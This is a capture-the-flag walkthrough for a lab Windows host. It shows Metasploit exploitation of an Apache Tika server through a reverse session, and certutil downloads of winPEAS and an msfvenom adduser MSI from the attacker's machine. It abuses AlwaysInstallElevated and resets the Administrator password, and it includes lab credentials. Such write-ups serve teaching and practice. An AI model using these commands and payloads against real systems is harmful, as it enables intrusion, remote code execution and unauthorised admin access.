- Enumeration
- Port Scans
- nmap - TCP All ports scan
- HTTP
- Manual Enumeration
- User flag
- Finding the exploit
- Configuring the exploit
- Run the exploit
- Viewing the user.txt file
- Privilege Escalation
- Enumeration
- Exploitation
- Connection via RDP
- Generating the payload
- Download the payload
- Execute the payload
- Gaining Administrator access.
- Reset the Administrator password
- Viewing the admin.txt file
Enumeration
Port Scans
nmap - TCP All ports scan
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/cyberlens/results/scans/_full_tcp_nmap.txt -oX /home/kali/thm/cyberlens/results/scans/xml/_full_tcp_nmap.xml cyberlens.thm
Port | State | Service | Version |
--- | --- | --- | --- |
80/tcp | open | http | Apache httpd 2.4.57 |
135/tcp | open | msrpc | Microsoft Windows RPC |
139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
445/tcp | open | microsoft-ds | |
3389/tcp | open | ms-wbt-server | Microsoft Terminal Services |
5985/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
47001/tcp | open | http | Microsoft HTTPAPI httpd 2.0 |
49664/tcp | open | msrpc | Microsoft Windows RPC |
49665/tcp | open | msrpc | Microsoft Windows RPC |
49666/tcp | open | msrpc | Microsoft Windows RPC |
49667/tcp | open | msrpc | Microsoft Windows RPC |
49668/tcp | open | msrpc | Microsoft Windows RPC |
49669/tcp | open | msrpc | Microsoft Windows RPC |
49670/tcp | open | msrpc | Microsoft Windows RPC |
49677/tcp | open | msrpc | Microsoft Windows RPC |
61777/tcp | open | http | Jetty 8.y.z-SNAPSHOT |
HTTP
Manual Enumeration
The main website on port 80 extracts and displays the metadata of any image you upload.
Uploading a basic image and reading the returned metadata shows that the parsing is done by Apache Tika. That is consistent with the Jetty listener on port 61777, which is the embedded HTTP server that tika-server exposes.
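Before reaching for an exploit it is worth fingerprinting the Tika server directly. The following is an added example, not part of the original writeup: the hostname and port come from the scan above, /version and /meta are tika-server's own REST routes, and the probe file is constructed here so it runs against nothing but the target.

```powershell
# Added example (not from the writeup): fingerprint the tika-server on 61777.
$base = 'http://cyberlens.thm:61777'   # host and port taken from the nmap results above

# 1. /version answers with a one-line banner such as "Apache Tika 1.17".
#    The Metasploit module used later targets versions up to 1.17 (fixed in 1.18),
#    so this tells you whether the target is in range before you fire anything.
$version = Invoke-RestMethod -Uri "$base/version" -Method Get
"Server banner: $version"

# 2. /meta takes a document in the request body and returns its metadata,
#    including X-Parsed-By, which names the Tika parser class that handled it.
#    A constructed text file is enough to confirm the service is Tika.
$probe = Join-Path $env:TEMP 'tika-probe.txt'
'hello tika' | Set-Content -Path $probe

$meta = Invoke-RestMethod -Uri "$base/meta" -Method Put -InFile $probe `
    -ContentType 'text/plain' -Headers @{ Accept = 'text/csv' }

# Print only the lines that identify the parser and the detected content type.
$meta -split "`n" | Where-Object { $_ -match '^"?(X-Parsed-By|Content-Type)' }
```

If /version reports 1.18 or later, the module selected below will not work and the upload feature needs a different approach.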
User flag
Finding the exploit
Search Metasploit for modules targeting Tika:
search tika
Configuring the exploit
Select the first exploit from the results. Selecting by index is fragile because the order depends on the module set installed, so run info afterwards and confirm you have the Apache Tika header command injection module (exploit/windows/http/apache_tika_jp2_jscript, CVE-2018-1335), which works against tika-server versions up to 1.17.
use 0
Configure the options. RPORT must be changed because the Tika server here listens on 61777 rather than Tika's default port:
set RPORT 61777
set RHOSTS 10.10.163.68
set LHOST 10.4.25.196
set LPORT 4444
Run the exploit
run
sysinfo
Viewing the user.txt file
shell
whoami
type C:\Users\cyberlens\Desktop\user.txt
Privilege Escalation
Enumeration
Download the latest winPEAS release to a directory on Kali and serve that directory with Python's built-in HTTP server:
python3 -m http.server 80
In the existing shell on the target, move to the user's profile directory:
cd %USERPROFILE%
Download winPEAS with certutil (the target can reach the Kali HTTP server on 10.4.25.196):
certutil -f -urlcache http://10.4.25.196/winpeas.exe winpeas.exe
Run winPEAS:
winpeas
The winPEAS output shows that AlwaysInstallElevated is enabled. This policy makes the Windows Installer service run any MSI package as SYSTEM, regardless of who launched it, but only when the value is 1 under both HKLM and HKCU (SOFTWARE\Policies\Microsoft\Windows\Installer); winPEAS reports both keys. With both set, we can build an MSI with msfvenom that executes whatever we like as SYSTEM.
The room's hints for the privilege escalation also say that connecting via RDP will make your life easier, and further enumeration turns up something that looks like a user account password:
type Documents\Management\CyberLens-Management.txt
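A quick way to confirm the winPEAS finding yourself, as an added example that is not part of the original writeup: read both policy values and only treat the primitive as available when both are 1. The registry paths below are the real policy locations; the cmd.exe equivalent is reg query with the same key and /v AlwaysInstallElevated.

```powershell
# Added example (not from the writeup): verify AlwaysInstallElevated properly.
# The policy is only effective when BOTH the machine-wide (HKLM) and the
# per-user (HKCU) value are 1. A single key set to 1 does not elevate anything.
$paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

$results = foreach ($p in $paths) {
    # Missing key or value means "not set" rather than an error.
    $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    [pscustomobject]@{
        Key                   = $p
        AlwaysInstallElevated = if ($null -eq $v) { 'not set' } else { $v }
    }
}
$results | Format-Table -AutoSize

$enabled = @($results | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2
if ($enabled) {
    'Both values are 1: any MSI this user installs runs as SYSTEM.'
} else {
    'Policy not fully enabled: an MSI installs with the caller''s own privileges.'
}

# Remediation for reference (run elevated): set both values to 0 or delete them.
#   Set-ItemProperty -Path $paths[0] -Name AlwaysInstallElevated -Value 0
#   Set-ItemProperty -Path $paths[1] -Name AlwaysInstallElevated -Value 0
```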
Exploitation
Connection via RDP
Connect with Remmina (or your preferred RDP client): enter the target's IP address and connect, accept the server's certificate when prompted (it is self-signed, so the client warns; click Yes), and log on with the credentials found earlier, CyberLens / HackSmarter123.
Once the session is up, use the client's full-screen toggle to make the RDP session easier to work in.
Generating the payload
On the Kali box, generate an MSI that wraps the windows/adduser payload. That payload creates a local user and adds it to the local Administrators group; here the account is rottenadmin with the password P@ssword123!.
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi
Download the payload
Open a command prompt inside the RDP session and download the payload with certutil. The MSI must sit in the directory the Python HTTP server from earlier is serving.
certutil.exe -f -urlcache http://10.4.25.196/alwe.msi alwe.msi
Execute the payload
Run the payload by invoking the MSI directly:
alwe.msi
Windows Installer will report an error. This is expected: the wrapper package has nothing real to install and fails after its custom action (the payload) has already executed, so the error can be ignored. Click OK.
The payload should create a new user which is an Administrator. We can verify this with the below command.
net user
We can see that the user has been created.
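The same install-and-verify step without the error dialog, as an added example that is not from the original writeup. It uses the writeup's file and account names, installs the package silently with msiexec, and then checks both that the account exists and that it landed in Administrators; Get-LocalUser and Get-LocalGroupMember assume Windows 10 / Server 2016 or later.

```powershell
# Added example (not from the writeup): install the MSI quietly and confirm the result.
$msi  = Join-Path (Get-Location) 'alwe.msi'   # file name used in the writeup
$user = 'rottenadmin'                          # account windows/adduser was told to create

# /quiet suppresses the "installation failed" dialog. A non-zero exit code is
# normal here: the wrapper MSI fails on purpose once its custom action has run.
$proc = Start-Process -FilePath msiexec.exe -ArgumentList "/i `"$msi`" /quiet /norestart" -Wait -PassThru
"msiexec exit code: $($proc.ExitCode) (non-zero is expected for this wrapper)"

# Because AlwaysInstallElevated makes the Installer service run the package as SYSTEM,
# the payload can create a user and add it to Administrators from a non-admin session.
$acct = Get-LocalUser -Name $user -ErrorAction SilentlyContinue
if ($null -eq $acct) {
    throw "$user was not created. Check that BOTH AlwaysInstallElevated values are 1 and that the MSI downloaded intact."
}

$isAdmin = [bool](Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
                  Where-Object { $_.Name -like "*\$user" })

"Created: $($acct.Name)  Enabled: $($acct.Enabled)  Member of Administrators: $isAdmin"
```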
Gaining Administrator access.
Use runas to open a new command prompt as the new user. The title bar of the window that appears shows it is running in the rottenadmin context.
runas /user:rottenadmin cmd
Enter P@ssword123! at the password prompt.
We can verify that this user is now a member of the Administrators group with the below command.
net localgroup Administrators
Attempting to read the Administrator flag from this window fails with access denied:
type C:\Users\Administrator\Desktop\admin.txt
Why? rottenadmin is a member of Administrators, but a process started with runas receives a UAC-filtered token: whoami /groups in this window lists BUILTIN\Administrators as "Group used for deny only" and the integrity level as Medium, so the Administrators entry in the ACL of C:\Users\Administrator does not apply. An elevated administrator could read the file directly (SYSTEM, Administrators and the profile owner all have Full Control on a profile folder by default), or take ownership and grant access if that ACL had been tightened. But this is just a CTF, so we can take the blunt route and reset the Administrator password.
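The token check and the ownership route described above, as an added example that is not part of the original writeup. It assumes it is saved as a .ps1 and started from the rottenadmin command prompt (cmd, then powershell -File check-admin.ps1), that the UAC consent prompt it triggers can be accepted from the RDP session, and it uses the writeup's flag path.

```powershell
# Added example (not from the writeup): show why runas gives "access denied"
# and how a real administrator token reads the file without resetting a password.
$target = 'C:\Users\Administrator\Desktop\admin.txt'   # path used in the writeup

# 1. In the runas window Administrators is deny-only and integrity is Medium.
whoami /groups | Select-String 'BUILTIN\\Administrators|Mandatory Level'

$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [Security.Principal.WindowsPrincipal]$identity
$elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
"Token elevated: $elevated"   # False in the runas window, True after UAC elevation

if (-not $elevated) {
    # Re-launch this script elevated. rottenadmin is an admin, so UAC shows a
    # consent prompt rather than asking for credentials (assumption: the prompt
    # is visible and can be accepted inside the RDP session).
    Start-Process -FilePath powershell.exe -Verb RunAs -ArgumentList @(
        '-NoExit', '-ExecutionPolicy', 'Bypass', '-File', $MyInvocation.MyCommand.Path
    )
    return
}

# 2. With a full token, the default profile ACL already grants Administrators
#    Full Control, so a plain read works.
try {
    Get-Content -Path $target -ErrorAction Stop
}
catch [System.UnauthorizedAccessException] {
    # 3. If the ACL had been tightened, an administrator can still take ownership
    #    (SeTakeOwnershipPrivilege is enabled in the full token) and grant itself read.
    takeown.exe /F $target | Out-Null
    icacls.exe $target /grant "${env:USERNAME}:(R)" | Out-Null
    Get-Content -Path $target
}
```

Both takeown and icacls leave traces (the owner and ACL of the file change), which is why on a real engagement you would note what was altered and restore it afterwards.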
Reset the Administrator password
Since this is a CTF we don't care about leaving changes behind, so we simply reset the Administrator account's password. Open the Local Users and Groups snap-in from the rottenadmin command prompt (accept the UAC consent prompt if one appears, as the snap-in needs an elevated token to change passwords):
lusrmgr.msc
Right-click the Administrator account and select Set Password…, then choose Proceed on the warning (it is about losing access to EFS-encrypted files and stored credentials, which does not matter here). Set a complex password and click OK.
A confirmation that the password has been set appears.
We can now run a new command prompt as the Administrator account with the newly reset password. Unlike rottenadmin, the built-in Administrator account is exempt from UAC Admin Approval Mode by default, so this window gets a full administrative token and can read the other user's profile.
runas /user:Administrator cmd
Viewing the admin.txt file
We can now view the admin.txt file.